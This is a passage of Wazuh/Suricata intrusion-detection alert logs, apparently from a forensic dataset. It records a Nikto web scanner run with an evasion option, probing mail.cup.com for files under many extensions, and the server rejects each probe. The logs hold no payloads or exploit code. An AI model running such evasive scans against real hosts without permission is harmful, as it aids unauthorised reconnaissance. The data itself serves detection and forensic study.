METHOD terminated by non-compliant character","id":"86601","firedtimes":11,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.21387","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.367902+0000\",\"flow_id\":829521377532493,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46958,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.et\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.367902+0000","flow_id":"829521377532493.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46958","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.et","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.370560+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":12,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.22921","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.370560+0000\",\"flow_id\":380826144121724,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46960,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.cmd\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.370560+0000","flow_id":"380826144121724.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46960","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.cmd","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.372779+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":13,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.24457","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.372779+0000\",\"flow_id\":319004384865496,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46962,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.x-shop\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.372779+0000","flow_id":"319004384865496.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46962","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.x-shop","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.375251+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":14,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.25999","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.375251+0000\",\"flow_id\":1.67220255094931e+15,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46964,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.dbc\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.375251+0000","flow_id":"1672202550949310.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46964","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.dbc","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.377295+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":15,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.27541","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.377295+0000\",\"flow_id\":2.17615683359514e+15,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46966,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.map\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.377295+0000","flow_id":"2176156833595140.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46966","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.map","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.379849+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":16,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.29083","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.379849+0000\",\"flow_id\":1414354189338696,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46968,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.Big5\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.379849+0000","flow_id":"1414354189338696.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46968","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.Big5","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.382662+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":17,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.30623","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.382662+0000\",\"flow_id\":268736087642508,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46970,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.10:100\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.382662+0000","flow_id":"268736087642508.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46970","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.10:100","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.385406+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":18,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.32165","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.385406+0000\",\"flow_id\":1931339402763667,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46972,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.nsf\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.385406+0000","flow_id":"1931339402763667.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46972","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.nsf","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.388338+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":19,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.33703","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.388338+0000\",\"flow_id\":2192726817433916,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46974,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.render_warning_screen\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.388338+0000","flow_id":"2192726817433916.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46974","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.render_warning_screen","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.390615+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":20,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.35277","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.390615+0000\",\"flow_id\":769894346584834,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46976,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.phtml\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.390615+0000","flow_id":"769894346584834.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46976","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.phtml","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.393834+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":21,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.36817","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.393834+0000\",\"flow_id\":1990996498513606,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46978,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.bin\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.393834+0000","flow_id":"1990996498513606.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46978","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.bin","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.396042+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":22,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.38355","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.396042+0000\",\"flow_id\":1431362259781643,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46980,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.dat\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.396042+0000","flow_id":"1431362259781643.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46980","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.dat","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.399022+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":23,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.39893","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.399022+0000\",\"flow_id\":2013892969108308,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46982,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.dbm\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.399022+0000","flow_id":"2013892969108308.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46982","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.dbm","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.401306+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":24,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.41431","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.401306+0000\",\"flow_id\":1806467523550245,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46984,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.html\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.401306+0000","flow_id":"1806467523550245.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46984","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.html","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.403790+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":25,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.42971","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.403790+0000\",\"flow_id\":1045261879748187,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46986,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.thtml\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.403790+0000","flow_id":"1045261879748187.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46986","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.thtml","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.406521+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":26,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.44513","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.406521+0000\",\"flow_id\":2137592322207186,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46988,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.AP\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 